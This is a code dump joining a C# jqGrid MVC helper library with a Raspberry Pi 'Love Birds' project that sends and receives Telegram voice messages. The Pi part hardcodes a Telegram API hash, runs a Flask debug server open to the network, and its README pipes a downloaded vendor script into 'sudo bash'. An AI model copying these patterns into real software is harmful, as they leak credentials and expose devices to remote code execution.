return new GridGenerator<TModel>(gridId, new GridConfiguration {GridKey = gridKey});
}
public static GridGenerator<TModel> JqGrid<TModel>(this GridFacotory factory, string gridId,GridConfiguration jqGridConfiguration)
{
return new GridGenerator<TModel>(gridId, jqGridConfiguration);
}
}
}<file_sep>/****************************************************
** 作者: Halower (QQ:121625933)
** 创始时间:2015-02-01
** 描述:jqGrid扩展构造列
*****************************************************/
using System;
using System.Collections.Generic;
using System.Reflection;
namespace HalowerHub.JqGrid
{
/// <summary>
/// Comparer used to sort IList collections by a named property.
/// </summary>
public class GridListSort<T>
{
private Dictionary<string, Func<PropertyInfo, T, T, int>> dicts = new Dictionary<string, Func<PropertyInfo,T,T, int>>();
/// <summary>
/// Constructor.
/// </summary>
/// <param name="propertyName">Name of the property to sort by</param>
/// <param name="isAsc">true for ascending, false for descending</param>
public GridListSort(string propertyName, bool isAsc)
{
PropertyName = propertyName;
IsAsc = isAsc;
dicts.Add("Int32", CompareInt);
dicts.Add("Double", CompareDouble);
dicts.Add("String", CompareString);
dicts.Add("DateTime", CompareDateTime);
dicts.Add("Decimal", CompareDecimal);
}
/// <summary>
/// Constructor; sorts ascending by default.
/// </summary>
/// <param name="propertyName">Name of the property to sort by</param>
public GridListSort(string propertyName)
{
PropertyName = propertyName;
IsAsc = true;
}
private string PropertyName { get; }
private bool IsAsc { get; }
#region Comparers
public int CompareInt(PropertyInfo prop, T x, T y)
{
var int1 = 0;
var int2 = 0;
if (prop.GetValue(x, null) != null)
{
int1 = Convert.ToInt32(prop.GetValue(x, null));
}
if (prop.GetValue(y, null) != null)
{
int2 = Convert.ToInt32(prop.GetValue(y, null));
}
return IsAsc ? int2.CompareTo(int1) : int1.CompareTo(int2);
}
public int CompareDouble(PropertyInfo prop, T x, T y)
{
double double1 = 0;
double double2 = 0;
if (prop.GetValue(x, null) != null)
{
double1 = Convert.ToDouble(prop.GetValue(x, null));
}
if (prop.GetValue(y, null) != null)
{
double2 = Convert.ToDouble(prop.GetValue(y, null));
}
return IsAsc ? double2.CompareTo(double1) : double1.CompareTo(double2);
}
public int CompareDecimal(PropertyInfo prop, T x, T y)
{
decimal decimal1 = 0m;
decimal decimal2 = 0m;
if (prop.GetValue(x, null) != null)
{
decimal1 = Convert.ToDecimal(prop.GetValue(x, null));
}
if (prop.GetValue(y, null) != null)
{
decimal2 = Convert.ToDecimal(prop.GetValue(y, null));
}
return IsAsc ? decimal2.CompareTo(decimal1) : decimal1.CompareTo(decimal2);
}
public int CompareString(PropertyInfo prop, T x, T y)
{
var string1 = string.Empty;
var string2 = string.Empty;
if (prop.GetValue(x, null) != null)
{
string1 = prop.GetValue(x, null).ToString();
}
if (prop.GetValue(y, null) != null)
{
string2 = prop.GetValue(y, null).ToString();
}
return IsAsc ? string.Compare(string2, string1, StringComparison.Ordinal) : string.Compare(string1, string2, StringComparison.Ordinal);
}
public int CompareDateTime(PropertyInfo prop, T x, T y)
{
var dateTime1 = DateTime.Now;
var dateTime2 = DateTime.Now;
if (prop.GetValue(x, null) != null)
{
dateTime1 = Convert.ToDateTime(prop.GetValue(x, null));
}
if (prop.GetValue(y, null) != null)
{
dateTime2 = Convert.ToDateTime(prop.GetValue(y, null));
}
return IsAsc ? dateTime2.CompareTo(dateTime1) : dateTime1.CompareTo(dateTime2);
}
#endregion
/// <summary>
/// Compares two items: the result is negative when x is less than y, zero when they are equal, and positive when x is greater than y.
/// </summary>
/// <param name="x"></param>
/// <param name="y"></param>
/// <returns></returns>
public int Compare(T x, T y)
{
var property = typeof (T).GetProperty(PropertyName);
var propName = property.PropertyType.Name;
if (dicts.ContainsKey(propName))
{
var action = dicts[propName];
return action.Invoke(property,x,y);
}
return 0;
}
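// Hedged usage sketch: sorting a list in place with this comparer. "Person" and "Name"
// are illustrative. Note that, as implemented above, passing true for isAsc yields a
// descending order, which is why callers such as ToTreeGrid pass (Sord == "desc") for it.
/*
people.Sort(new GridListSort<Person>("Name", false).Compare);  // ascending by Name
*/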
}
}<file_sep>/****************************************************
** Author: Halower (QQ:121625933)
** Created: 2015-02-01
** Description: jqGrid extension grid configuration
*****************************************************/
using System.Collections.Generic;
using System.Linq;
using Newtonsoft.Json;
namespace HalowerHub.JqGrid
{
public class GridConfiguration
{
#region Constructors
public GridConfiguration(params GridColumn[] gridColumns)
{
ColSPanConfiguation = new ColSPanConfiguation();
GridOperation = new GridOperation();
var columns = new List<IGridColumn>();
columns.AddRange(gridColumns);
GridColumns = columns;
}
#endregion
#region Fields
private string _dataType;
private string _mType;
private string _pagerId;
private int[] _rowList;
private int? _rowNum;
private bool? _viewRecords;
#endregion
#region Properties
[JsonProperty("url")]
public string Url { get; set; }
[JsonProperty("datatype")]
public string DataType
{
get { return _dataType ?? "json"; }
set { _dataType = value; }
}
[JsonProperty("colNames")]
public string[] ColNames
{
get { return GridColumns.ToList().Select(c => c.DisplayName).ToArray(); }
}
[JsonProperty("colModel")]
public List<IGridColumn> GridColumns { get; set; }
[JsonProperty("rowNum")]
public int RowNum
{
get { return _rowNum ?? 10; }
set { _rowNum = value; }
}
[JsonProperty("rowList")]
public int[] RowList
{
get { return _rowList ?? new[] {10, 20, 30}; }
set { _rowList = value; }
}
[JsonProperty("pager")]
public string PagerId
{
get { return !string.IsNullOrEmpty(_pagerId) ? "#" + _pagerId : null; }
set { _pagerId = value; }
}
[JsonProperty("sortname")]
public string SortName { get; set; }
[JsonProperty("mtype")]
public string MTyope
{
get { return _mType ?? "post"; }
set { _mType = value; }
}
/// <summary>
/// Whether to show the total record count in the pager bar.
/// </summary>
[JsonProperty("viewrecords")]
public bool ViewRecords
{
get { return _viewRecords ?? true; }
set { _viewRecords = value; }
}
[JsonIgnore]
public ColSPanConfiguation ColSPanConfiguation { get; set; }
/// <summary>
/// Initial sort order when reading XML or JSON data from the server.
/// </summary>
[JsonProperty("sortorder")]
public string Sortorder { get; set; }
[JsonProperty("caption")]
public string Caption { get; set; }
[JsonProperty("direction")]
public string Direction { get; set; }
[JsonProperty("loadtext")]
public string LoadText { get; set; }
[JsonProperty("pginput")]
public bool PgInput { get; set; }
[JsonProperty("postData")]
public Dictionary<string, string> PostData { get; set; }
[JsonProperty("autowidth")]
public bool AutoWidth { get; set; }
[JsonProperty("autoencode")]
public bool? AutoEencode { get; set; }
[JsonProperty("emptyrecords")]
public string EmptyRecords { get; set; }
[JsonProperty("height")]
public string Height { get; set; }
[JsonProperty("multiselect")]
public bool Multiselect { get; set; }
[JsonIgnore]
public GridOperation GridOperation { get; set; }
[JsonIgnore]
public bool MultiSearch { get; set; }
[JsonProperty("gridComplete")]
public string GridComplete { get; set; }
#region Sub-grid
[JsonProperty("subGrid")]
public bool? SubGrid { get; set; }
[JsonProperty("subGridModel")]
public SubGridTable[] SubGridModel { get; set; }
[JsonProperty("subGridType")]
public object SubGridType { get; set; }
[JsonProperty("subGridUrl")]
public string SubGridUrl { get; set; }
[JsonIgnore]
public bool GroupHeaders { get; set; }
[JsonIgnore]
public string GridKey { get; set; }
[JsonProperty("subGridRowExpanded")]
public string SubGridRowExpanded { get; set; }
[JsonIgnore]
public bool PerClearCache { get; set; }
[JsonProperty("treeGrid")]
public bool TreeGrid { get; set; }
[JsonProperty("treeGridModel")]
public string TreeGridModel { get; set; }
public string ExpandColumn { get; internal set; }
[JsonProperty("treeIcons")]
public string TreeIcons { get; internal set; }
[JsonProperty("tree_root_level")]
public string TreeRootLevel { get; internal set; }
[JsonProperty("editurl")]
public string EditUrl { get; internal set; }
[JsonProperty("onSelectRow")]
public string OnSelectRow { get; internal set; }
[JsonProperty("onSelectAll")]
public string OnSelectAll { get; internal set; }
#endregion
}
#endregion
}<file_sep>/****************************************************
** Author: Halower (QQ:121625933)
** Created: 2015-02-01
** Description: jqGrid extension cell-operation configuration class
*****************************************************/
using System.Diagnostics;
using Newtonsoft.Json;
namespace HalowerHub.JqGrid
{
public class GridOperation
{
[JsonProperty("edit")]
public bool Edit { get; set; }
[JsonProperty("edittext")]
public string EditText { get; set; }
/// <summary>
/// Edit icon
/// </summary>
[JsonProperty("editicon")]
public string Editicon { get; set; } = "ui-icon ui-icon-pencil";
[JsonProperty("add")]
public bool Add { get; set; }
[JsonProperty("addtext")]
public string AddText { get; set; }
/// <summary>
/// Add icon
/// </summary>
[JsonProperty("addicon")]
public string Addicon { get; set; } = "ui-icon ui-icon-plus";
/// <summary>
/// Whether the delete button is shown
/// </summary>
[JsonProperty("del")]
public bool Delete { get; set; }
/// <summary>
/// Delete button text
/// </summary>
[JsonProperty("deltext")]
public string DeleteText { get; set; }
/// <summary>
/// Delete icon
/// </summary>
[JsonProperty("delicon")]
public string Delicon { get; set; } = "ui-pg-button ui-corner-all";
[JsonProperty("search")]
public bool Search { get; set; }
[JsonProperty("searchtext")]
public string SearchText { get; set; }
[JsonProperty("searchicon")]
public string SearchIcon { get; set; } = "ui-icon ui-icon-search";
[JsonProperty("refresh")]
public bool Refresh { get; set; }
[JsonProperty("refreshText")]
public string RefreshText { get; set; }
[JsonProperty("refreshicon ")]
public string Refreshicon { get; set; } = "ui-icon ui-icon-refresh";
}
}<file_sep>/****************************************************
** Author: Halower (QQ:121625933)
** Created: 2015-03-21
** Description: jqGrid query extensions
*****************************************************/
using System;
using System.Collections.Generic;
using System.Linq;
using System.Linq.Expressions;
using Newtonsoft.Json;
namespace HalowerHub.JqGrid
{
public class GridRule
{
public string Field { get; set; }
public string Op { get; set; }
public string Data { get; set; }
}
public class GridFilters
{
public string GroupOp { get; set; }
public List<GridRule> Rules { get; set; }
}
public static class GridSearchPredicate
{
public static Expression<Func<T, bool>> SingleSearchExpression<T>(string searchField, string searchOper,string searchString) where T : class
{
var predicate = PredicateBuilder.True<T>();
if (string.IsNullOrEmpty(searchField)) return predicate;
var filed = typeof(T).GetProperty(searchField);
// Single search condition, so one switch is enough (no need for multiple if/else chains).
switch (searchOper)
{
case "eq":
predicate =predicate.And(x => filed.GetValue(x, null).ToString() == searchString);
break;
case "bw":
predicate=predicate.And(x => filed.GetValue(x, null).ToString().StartsWith(searchString));
break;
case "cn":
predicate=predicate.And(x => filed.GetValue(x, null).ToString().Contains(searchString));
break;
case "gt":
{
if (filed.PropertyType.Name == "DateTime")
{
predicate = predicate.And(x => DateTime.Parse(filed.GetValue(x, null).ToString()) > DateTime.Parse(searchString));
}
else
{
predicate = predicate.And(x => decimal.Parse(filed.GetValue(x, null).ToString()) > decimal.Parse(searchString));
}
}
break;
case "lt":
{
if (filed.PropertyType.Name == "DateTime")
{
predicate = predicate.And(x => DateTime.Parse(filed.GetValue(x, null).ToString()) < DateTime.Parse(searchString));
}
else
{
predicate = predicate.And(x => decimal.Parse(filed.GetValue(x, null).ToString()) < decimal.Parse(searchString));
}
}
break;
default:
break;
}
return predicate;
}
public static Expression<Func<T, bool>> MultiSearchExpression<T>(string filtersContent) where T : class
{
var predicate = PredicateBuilder.True<T>();
var filters = JsonConvert.DeserializeObject<GridFilters>(filtersContent);
predicate = filters.GroupOp == "AND"
? filters.Rules.Aggregate(predicate,
(current, rule) => current.And(SingleSearchExpression<T>(rule.Field, rule.Op, rule.Data)))
: filters.Rules.Aggregate(predicate,
(current, rule) => current.Or(SingleSearchExpression<T>(rule.Field, rule.Op, rule.Data)));
return predicate;
}
}
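// Illustrative sketch of the multi-search payload jqGrid posts (matching GridFilters/
// GridRule above) and how it maps to a predicate; the JSON literal and the "Person"
// type are assumptions for the example.
/*
var json = "{\"GroupOp\":\"AND\",\"Rules\":[{\"Field\":\"Name\",\"Op\":\"cn\",\"Data\":\"a\"}]}";
var filter = GridSearchPredicate.MultiSearchExpression<Person>(json);
var matches = people.Where(filter.Compile()).ToList();
*/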
}<file_sep>namespace HalowerHub.JqGrid
{
public enum CellTypes
{
String,
Number,
DateTime
}
}<file_sep>/****************************************************
** Author: Halower (QQ:121625933)
** Created: 2015-02-01
** Description: jqGrid extension grid column properties
*****************************************************/
using Newtonsoft.Json;
namespace HalowerHub.JqGrid
{
public class GridColumn : IGridColumn
{
#region Main methods
/// <summary>
/// Creates a column, mapping a field to its display name.
/// </summary>
/// <param name="field">Field name</param>
/// <param name="name">Display name</param>
/// <returns></returns>
public GridColumn(string field, string name)
{
Field = field;
DisplayName = name;
}
#endregion Main methods
#region Fields
private string _aligin;
private string _index;
private bool? _search;
private string _fomatter;
#endregion Fields
#region Properties
[JsonProperty("name")]
public string Field { get; set; }
[JsonProperty("index")]
public string Index
{
get { return _index ?? Field; }
set { _index = value; }
}
[JsonProperty("width")]
public int? Width { get; set; }
[JsonProperty("align")]
public string Align
{
get { return _aligin ?? "left"; }
set { _aligin = value; }
}
[JsonIgnore]
public string DisplayName { get; set; }
[JsonProperty("sortable")]
public bool Sortable { get; set; }
[JsonProperty("hidden")]
public bool Hidden { get; set; }
[JsonProperty("editable")]
public bool Editable { get; set; }
[JsonProperty("search")]
public bool Search
{
get { return _search ?? false; }
set { _search = value; }
}
[JsonProperty("stype")]
public string SearchType { get; set; }
[JsonProperty("sorttype")]
public string SortType { get; set; }
[JsonProperty("edittype")]
public string EditType { get; set; }
[JsonProperty("searchoptions")]
public string Searchoptions
{
get
{
if (SearchType == "select")
return "&{dataUrl:'" + SelectDataSourceUrl + "',sopt:['eq']}&";
else
{
switch (SearchFiledType)
{
case CellTypes.String:
return "&{sopt:['eq','bw','cn']}&";
case CellTypes.Number:
return "&{sopt:['eq','lt','gt']}&";
case CellTypes.DateTime:
return @"&{sopt:['eq','lt','gt'],dataInit: function (elem) {jQuery(elem).datepicker({changeMonth: true,changeYear: true,dateFormat:'yy年mm月dd日'});}}&";
default:
return "&{sopt:['eq','bw','cn']}&";
}
}
}
}
[JsonProperty("formatter")]
public string Formatter
{
get
{
if (!string.IsNullOrEmpty(_fomatter))
return "&" + _fomatter + "&";
return null;
}
set { _fomatter = value; }
}
[JsonProperty("cellattr")]
public string CellAttr { get; set; }
[JsonIgnore]
public CellTypes SearchFiledType { get; set; }
[JsonIgnore]
public string SelectDataSourceUrl { get; internal set; }
[JsonProperty("formatoptions")]
public Formatoption Formatoptions { get; internal set; }
[JsonProperty("editoptions")]
public string Editoptions { get; internal set; }
[JsonProperty("editrules")]
public EditRules EditRule { get; set; }
#endregion Properties
}
}<file_sep>/****************************************************
** Author: Halower (QQ:121625933)
** Created: 2015-02-01
** Description: jqGrid extension properties
*****************************************************/
using Newtonsoft.Json;
namespace HalowerHub.JqGrid
{
public class GroupHeader
{
public GroupHeader(string startColumnName, int numberOfColumns, string titleTextHtml)
{
StartColumnName = startColumnName;
NumberOfColumns = numberOfColumns;
TitleText = titleTextHtml;
}
[JsonProperty("startColumnName")]
public string StartColumnName { get; set; }
[JsonProperty("numberOfColumns")]
public int NumberOfColumns { get; set; }
[JsonProperty("titleText")]
public string TitleText { get; set; }
}
}<file_sep>using System.ComponentModel.DataAnnotations;
namespace JQgridTest.Models
{
public class Person
{
public int Id { get; set; }
[Display(Name ="姓名")]
public string Name { get; set; }
[Display(Name = "密码")]
public string Password { get; set; }
}
}
directory_id
83550a1b02b7cad561981b549ca1a78f40d5170b
languages
["Markdown", "C#"]
num_files
39
repo_language
C#
repo_name
halower/JqGridForMvc
revision_id
ad3e00ca1f4e9d9761015fe2c5411f41be7051a9
snapshot_id
dfa0c8cf2d506f105ca0fa64399d78226362b58c
branch_name
refs/heads/master
<file_sep>#!/bin/bash
#init led & button
echo 25 >/sys/class/gpio/export
echo out >/sys/class/gpio/gpio25/direction
echo 23 >/sys/class/gpio/export
echo in >/sys/class/gpio/gpio23/direction
#infinite loop
while [ 1 ]
do
#led ON
echo 1 >/sys/class/gpio/gpio25/value
echo "-----> Test for Raspiaudio MIC+"
echo "------Please puch on the Yellow button to continue"
amixer set Micro 50%
amixer set Master 96%
sudo alsactl store
#waiting button pressed
while [ `cat /sys/class/gpio/gpio23/value` = 1 ]; do
set i = 1
done
#led OFF
echo 0 >/sys/class/gpio/gpio25/value
#record 4s
arecord -d4 --rate=44000 /home/pi/test.wav&
#test channels L & R
speaker-test -l1 -c2 -t wav
#led BLINK
echo 1 >/sys/class/gpio/gpio25/value
sleep 1
echo 0 >/sys/class/gpio/gpio25/value
#led BLINK
echo 1 >/sys/class/gpio/gpio25/value
sleep 1
echo 0 >/sys/class/gpio/gpio25/value
echo "playing the recording"
#play record
aplay /home/pi/test.wav
echo "------------------------------------------------------------------------"
echo "Test is done to adjust speakers volume and microphone gain run: alsamixer"
exit
done
#echo 25 >/sys/class/gpio/unexport
<file_sep>// Initializes the Wi-Fi access by writing the file /etc/wpa_supplicant/wpa_supplicant.conf
// from the configuration file:
//   /boot/WIFI.txt ===> complete wpa_supplicant configuration (ssid + password)
//
// (The deletion of the file and the reboot are commented out at the end of main.)
//
///////////////////////////////////////////////////
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
int main()
{
char b[1000];
int p;
int n;
p = open("/boot/WIFI.txt", O_RDONLY);
if(p == -1) exit(0);
n = read(p,b,1000);
close(p);
remove("/etc/wpa_supplicant/wpa_supplicant.conf");
p = open("/etc/wpa_supplicant/wpa_supplicant.conf", O_WRONLY+O_CREAT, 0644);
n=write(p, b, n);
close(p);
//restart service with new config
system("sudo systemctl daemon-reload");
system("sudo systemctl restart dhcpcd");
//remove("/boot/WIFI.txt");
//system("shutdown -r now");
}
<file_sep>#!/bin/bash
sleep 3
cd /home/pi/LB
/usr/bin/python3.5 /home/pi/LB/valentin.py&
sudo /usr/bin/python3.5 /home/pi/LB/initTG.py&
<file_sep>#!/usr/bin/python3.5
# credit to <NAME>
import asyncio
import time
import os
import sys
import signal
from telethon import TelegramClient, events, sync
from telethon.tl.types import InputMessagesFilterVoice
import RPi.GPIO as GPIO
from gpiozero import Servo
from time import sleep
"""
initialisation of GPIOs
"""
global recLED #led recording (mic+)
global recBUT #button recording (mic+)
global playLED #led you have a voicemail
global p
global toPlay # number of voicemail waiting
global recD # duration of recording (in half second)
global playOK # authorization to play messages (boolean)
global playOKD # timeout (in half seconds) for the play authorization
global motorON # motor command
global previousMotorON #was the motor on before?
global heartBeatLed #heartbeat effect on led
global motor
heartBeatLed = False
previousMotorON = False
motorON = False
playOK = False
recD = 0
playOKD = 0
toPlay = -1
playLED = 22
recLED = 25
recBUT = 23
motor = 17
"""
initialisation of GPIO leds and switch and motor
"""
GPIO.setmode(GPIO.BCM)
GPIO.setup(recLED, GPIO.OUT)
GPIO.setup(recBUT, GPIO.IN)
GPIO.setup(playLED, GPIO.OUT)
GPIO.setup(motor, GPIO.OUT)
GPIO.output(recLED, GPIO.LOW)
async def timeC():
"""
time management: duration of recording and timeout for the authorization to play
"""
global playOK
global playOKD
global recD
global motorON
while True :
await asyncio.sleep(0.5)
recD = recD + 1
if playOK == True:
playOKD = playOKD - 1
if playOKD <= 0:
playOK = False
async def recTG():
"""
Send a message 'voice'
initialisation of gpio led and button
when button is pushed: recording in a separate process
that is killed when the button is released
conversion to .oga by sox
"""
global recD
global playOK
global playOKD
global heartBeatLed
delay = 0.2
while True:
await asyncio.sleep(delay)
if GPIO.input(recBUT) == GPIO.LOW:
heartBeatLed = False
p.ChangeDutyCycle(100) #turns ON the REC LED
recD = 0
pid = os.fork()
if pid == 0 :
os.execl('/usr/bin/arecord','arecord','--rate=44000','/home/pi/rec.wav','')
else:
while GPIO.input(recBUT) == GPIO.LOW :
await asyncio.sleep(delay)
os.kill(pid, signal.SIGKILL)
heartBeatLed = False
#GPIO.output(recLED, GPIO.LOW)
p.ChangeDutyCycle(0) #turns OFF the REC LED
playOK = True
playOKD = 30
if recD > 1:
os.system('sudo killall sox')
os.system('/usr/bin/sox /home/pi/rec.wav /home/pi/rec.ogg')
os.rename('/home/pi/rec.ogg', '/home/pi/rec.oga')
await client.send_file(peer, '/home/pi/rec.oga',voice_note=True)
else:
#heartBeatLed = False
#GPIO.output(recLED, GPIO.LOW)
p.ChangeDutyCycle(0)
#motor uses global to turn ON the motor
async def motor():
global motorON
global motor
global previousMotorON
# Adjust the pulse values to set rotation range
min_pulse = 0.000544 # Library default = 1/1000
max_pulse = 0.0024 # Library default = 2/1000
# Initial servo position
pos = 1
test = 0
servo = Servo(17, pos, min_pulse, max_pulse, 20/1000, None)
while True:
await asyncio.sleep(0.2)
if motorON == True:
pos=pos*(-1)
servo.value=pos
await asyncio.sleep(2)
else :
#put back in original position
servo.value=0
#detach the motor to avoid glitches and save energy
servo.detach()
previousMotorON = False
#this is the led that mimics a heartbeat when a voicemail is waiting
async def heartBeat():
global heartBeatLed
global p
p = GPIO.PWM(recLED, 500) # set Frequece to 500Hz
p.start(100) # Start PWM output, Duty Cycle = 0
while True:
if heartBeatLed == True :
for dc in range(0, 20, 2): # Increase duty cycle: 0~100
p.ChangeDutyCycle(dc)
await asyncio.sleep(0.01)
for dc in range(20, -1, -2): # Decrease duty cycle: 100~0
p.ChangeDutyCycle(dc)
await asyncio.sleep(0.005)
time.sleep(0.05)
for dc in range(0, 101, 2): # Increase duty cycle: 0~100
p.ChangeDutyCycle(dc) # Change duty cycle
await asyncio.sleep(0.01)
for dc in range(100, -1, -2): # Decrease duty cycle: 100~0
p.ChangeDutyCycle(dc)
await asyncio.sleep(0.01)
await asyncio.sleep(0.06)
for dc in range(0,8, 2): # Increase duty cycle: 0~100
p.ChangeDutyCycle(dc) # Change duty cycle
await asyncio.sleep(0.01)
for dc in range(7, -1, -1): # Decrease duty cycle: 100~0
p.ChangeDutyCycle(dc)
await asyncio.sleep(0.01)
await asyncio.sleep(1)
else :
await asyncio.sleep(0.1)
async def playTG():
"""
when authorized to play (playOK == True)
play one or several messages waiting (file .ogg) playLED on
message playing => playing
last message waiting => toPlay
"""
global toPlay
global playOK
global motorON
global heartBeatLed
global servo
global playOKD
playing = 0
while True:
if toPlay >= 0:
GPIO.output(playLED, GPIO.HIGH)
motorON = True
heartBeatLed = True
else:
GPIO.output(playLED, GPIO.LOW)
motorON = False
heartBeatLed = False
if (toPlay >= 0) and (playOK == True):
while playing <= toPlay:
name = '/home/pi/play' + str(playing) + '.ogg'
os.system('sudo killall vlc')
pid = os.fork()
if pid == 0 :
os.execl('/usr/bin/cvlc', 'cvlc', name, '--play-and-exit')
#os.execl('/usr/bin/cvlc', 'cvlc', name, ' vlc://quit')
os.wait()
playing = playing + 1
if playing <= toPlay :
await asyncio.sleep(1)
playing = 0
toPlay = -1
playOK = True
playOKD = 30
await asyncio.sleep(0.2)
"""
initialization of the Telegram application and user
init of the correspondent's name from the file /boot/PEER.txt
declaration of the handler for incoming messages
filtering of messages coming from the correspondent
download of the .oga file, renamed to .ogg
"""
GPIO.output(playLED, GPIO.HIGH)
motorON=True
api_id = 592944
api_hash = 'ae06a0f0c3846d9d4e4a7065bede9407'
client = TelegramClient('session_name', api_id, api_hash)
time.sleep(2)
client.connect()
if not client.is_user_authorized():
while os.path.exists('/home/pi/phone') == False:
pass
f = open('/home/pi/phone', 'r')
phone = f.read()
f.close()
os.remove('/home/pi/phone')
print(phone)
time.sleep(2)
client.send_code_request(phone,force_sms=True)
while os.path.exists('/home/pi/key') == False:
pass
f = open('/home/pi/key', 'r')
key = f.read()
f.close()
print (key)
os.remove('/home/pi/key')
time.sleep(2)
me = client.sign_in(phone=phone, code=key)
GPIO.output(playLED, GPIO.LOW)
motorON=False
p = open('/boot/PEER.txt','r')
peer = p.readline()
if peer[-1] == '\n':
peer = peer[0:-1]
#print(peer)
#print(len(peer))
@client.on(events.NewMessage)
async def receiveTG(event):
global toPlay
#print(event.stringify())
fromName = '@' + event.sender.username
#only plays messages sent by your correspondent; to play messages from everybody, comment the next line and uncomment the one after it
if (event.media.document.mime_type == 'audio/ogg') and (peer == fromName) :
#if (event.media.document.mime_type == 'audio/ogg'):
ad = await client.download_media(event.media)
#print('ok')
toPlay = toPlay + 1
#print(toPlay)
if toPlay == 0:
#os.system('/usr/bin/cvlc --play-and-exit /home/pi/LB/lovebird.wav')
os.system('/usr/bin/cvlc --play-and-exit /home/pi/LB/lovebird.wav')
name = '/home/pi/play' + str(toPlay) + '.ogg'
#print(name)
os.rename(ad,name)
await asyncio.sleep(0.2)
#os.system('/usr/bin/cvlc --play-and-exit ' + name)
"""
Main sequence: the receiveTG handler, playTG, timeC, recTG, motor and heartBeat are executed in parallel
"""
#os.system('/usr/bin/cvlc /home/pi/LB/lovebird.wav vlc://quit')
os.system('/usr/bin/cvlc --play-and-exit /home/pi/LB/lovebird.wav')
loop = asyncio.get_event_loop()
loop.create_task(recTG())
loop.create_task(playTG())
loop.create_task(timeC())
loop.create_task(motor())
loop.create_task(heartBeat())
loop.run_forever()
client.run_until_disconnected()
<file_sep>from flask import Flask, render_template, redirect, url_for, request, make_response
import datetime
import os
app = Flask(__name__)
@app.route('/',methods = ['POST', 'GET'])
def index():
now = datetime.datetime.now()
timeString = now.strftime("%H:%M:%S %d/%m/%Y")
txt = open('/boot/PEER.txt', 'r')
currentPeer = txt.read()
txt.close()
txt = open('/home/pi/phone', 'r')
currentPhone = txt.read()
txt.close()
if request.method == 'POST':
peer = request.form['peer']
if len(peer) > 0:
f = open('/boot/PEER.txt', 'w')
f.write(peer)
f.close()
os.system('sudo reboot&')
#os.system('chgrp pi /home/pi/peer')
phone = request.form['phone']
if len(phone) > 0:
f = open('/home/pi/phone', 'w')
f.write(phone)
currentPhone = phone
f.close()
os.system('chown pi /home/pi/phone')
os.system('chgrp pi /home/pi/phone')
key = request.form['key']
if len(key) > 0:
f = open('/home/pi/key', 'w')
f.write(key)
f.close()
os.system('chown pi /home/pi/key')
os.system('chgrp pi /home/pi/key')
template = {
'title' : 'LOVE BIRDS',
'time' : timeString,
'currentPeer' : currentPeer,
'currentPhone' : currentPhone
}
return render_template('index.html', **template)
if __name__ == "__main__":
app.run(host='0.0.0.0', port=80, debug=True)
<file_sep># LOVE BIRDS
## Send and receive voice messages using Raspberry PI Zero and Telegram
### What is Love (birds)?
It’s a standalone device to send and receive voice messages with one person: a lover, family member or friend. Open the box, push the button while you talk, release to send. Your correspondent will receive the voice message in the Telegram phone app or on their own LoveBirds box, with a nice motor move and bird song.
See the video here: https://www.youtube.com/watch?v=enLJgY6dZ9U
This is the method to install the Love Birds project from scratch. **If you want an easier installation method, please follow the Instructable here to just burn the prebuilt SD card:**
https://www.instructables.com/id/Love-Birds-a-Box-to-Send-and-Receive-Telegram-Audi/
or here https://www.raspiaudio.com/lovebirds/
### Ok so you want to go the hard way and rebuild it from scratch:
#### Architecture:
initWiFi ⇒ initializes Wi-Fi access: takes the file /boot/WIFI.txt (easily accessible by just editing the file with a Windows computer and an SD card reader), renames it wpa_supplicant.conf and copies it to /etc/wpa_supplicant/wpa_supplicant.conf
initTG.py ⇒ initializes the Telegram connection, to send messages as the user. Configuration is done using a web page managed by Flask that basically asks the user for his Telegram phone number, the confirmation code received by SMS, and the name of the correspondent (who you want to talk to). It copies PHONE and PEER.txt into files used later by valentin.py
. PEER.txt — the input format is @JohnBlack
. PHONE — international format, e.g. +33777792516
. SMS confirmation code, e.g. 12345
valentin.py ⇒ the application itself
#### Installation steps
-Start from a Raspbian Stretch Lite image and burn it on an SD card: https://downloads.raspberrypi.org/raspbian_lite_latest
##### Required packages:
. telethon
sudo apt-get install python3-pip
sudo pip3 install telethon
. sox
sudo apt-get install sox
. vlc
sudo apt-get install vlc
. GPIO
sudo apt-get install python3-gpiozero
sudo apt-get install python-rpi.gpio python3-rpi.gpio
. Flask
sudo pip3 install flask
##### If you use the MIC+ sound card, install it; otherwise skip this section. MIC+ is a cool sound card as it has all in one: 2 speakers, a microphone and a button LED. https://www.raspiaudio.com/raspiaudio-aiy
sudo wget -O mic mic.raspiaudio.com
sudo bash mic
-Say yes for the reboot
-On the next reboot you have to run the test to finish the installation (it is an ALSA oddness):
sudo wget -O test test.raspiaudio.com
sudo bash test
Push the onboard button; you should hear "Front Left", "Front Right", then the sequence recorded by the microphone.
##### Start the programs on boot
Copy the /LB directory of this Git repository to /home/pi/LB
sudo cp /home/pi/LB/rc.local /etc
Boot the system and open a browser from any computer on your local network to complete the Telegram configuration (see the Instructable from that point).
<file_sep>#!/bin/bash
: <<'DISCLAIMER'
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
This script is licensed under the terms of the MIT license.
Unless otherwise noted, code reproduced herein
was written for this script.
- The PiZeroAudio Crew -
DISCLAIMER
# script control variables
productname="Rasiaudio MIC+ " # the name of the product to install
scriptname="pizeroaudio" # the name of this script
spacereq=1 # minimum size required on root partition in MB
debugmode="no" # whether the script should use debug routines
debuguser="none" # optional test git user to use in debug mode
debugpoint="none" # optional git repo branch or tag to checkout
forcesudo="yes" # whether the script requires to be ran with root privileges
promptreboot="no" # whether the script should always prompt user to reboot
mininstall="no" # whether the script enforces minimum install routine
customcmd="yes" # whether to execute commands specified before exit
armhfonly="yes" # whether the script is allowed to run on other arch
armv6="yes" # whether armv6 processors are supported
armv7="yes" # whether armv7 processors are supported
armv8="yes" # whether armv8 processors are supported
raspbianonly="no" # whether the script is allowed to run on other OSes
osreleases=( "Raspbian" ) # list os-releases supported
oswarning=( ) # list experimental os-releases
